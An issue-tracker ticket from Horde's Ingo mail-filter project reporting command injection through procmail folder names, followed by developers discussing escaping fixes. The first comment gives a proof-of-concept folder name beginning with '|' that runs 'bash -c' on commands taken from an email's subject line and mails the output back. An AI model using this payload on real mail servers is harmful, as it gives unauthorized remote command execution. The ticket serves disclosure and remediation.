5.2.0-git
04/23/2014

[#4513] command execution with procmail
Summary command execution with procmail
Queue Ingo
Queue Version 1.1.1
Type Bug
State Resolved
Priority 3. High
Owners
Requester michael.menge (at) zdv (dot) uni-tuebingen (dot) de
Created 10/11/2006 (2751 days ago)
Due
Updated 10/14/2006 (2748 days ago)
Assigned 10/14/2006 (2748 days ago)
Resolved 10/14/2006 (2748 days ago)
Milestone
Patch No

History
10/14/2006 09:56:52 PM Chuck Hagenbuch Comment #6
State ⇒ Resolved
Reply to this comment
K, just wanted to double check.
10/14/2006 06:48:53 PM ben Comment #5 Reply to this comment
I looked at both, and escapeshellcmd() seems to be more appropriate.
10/14/2006 06:41:17 PM Chuck Hagenbuch Comment #4
State ⇒ Assigned
Reply to this comment
Careful with that; escapeshellcmd is for an entire command. 
escapeshellarg is for a single argument and may be more appropriate 
here (also may not, but you should double-check if you didn't already 
look at it).
10/14/2006 07:32:50 AM ben Comment #3
State ⇒ Resolved
Reply to this comment
escapeshellcmd() should take care of escaping all necessary characters 
(since that's what it's designed to do).



Fixed in HEAD and FRAMEWORK_3.
10/13/2006 05:37:34 PM Benoit (dot) Branciard (at) univ-paris1 (dot) fr Comment #2 Reply to this comment
A possible way to handle this, from my own procmail knowledge and 
experiments, would be to escape the folder filenames the following way :



- if the first character is ":", "*", "!", "|", "{" or "}" : prepend 
"./" to the filename

- quote the whole filename with 'single quotes'



but I wonder if procmail may exist on systems where the folder 
separator isn't "/"...


10/11/2006 11:56:01 AM Jan Schneider Assigned to ben
State ⇒ Assigned
 
10/11/2006 11:34:08 AM michael (dot) menge (at) zdv (dot) uni-tuebingen (dot) de Comment #1
State ⇒ Unconfirmed
Priority ⇒ 3. High
Type ⇒ Bug
Summary ⇒ command execution with procmail
Queue ⇒ Ingo
Reply to this comment
It is possible to use a foldername beginning

with | as mailbox destination in a filterrule.



If the users don't have shell acces to the mailserver this rule could be

used to bypass this restriction.



EXCAPMLE:



The Foldername

|formail    -rA     "X-Loop:hisemailaddres@excample.com"   |       (   
     cat     -       ;myCmd="$MATCH";  echo    "Executing:     $myCmd" 
;       bash    -c      "$myCmd"

  )       |$SENDMAIL        -oi     -t



would result in a prcmail like the following



* ^From:.*hisemailaddres@excample\.com

{

   :0

   * ^Subject:.*exec_command\/.*$

   |formail    -rA     "X-Loop:hisemailaddres@excample.com"   |       
(       cat     -

    ;

         myCmd="$MATCH"; echo    "Executing:     $myCmd" ;       bash   
   -c      "$myCmd"

       )

         |       $SENDMAIL       -oi     -t

}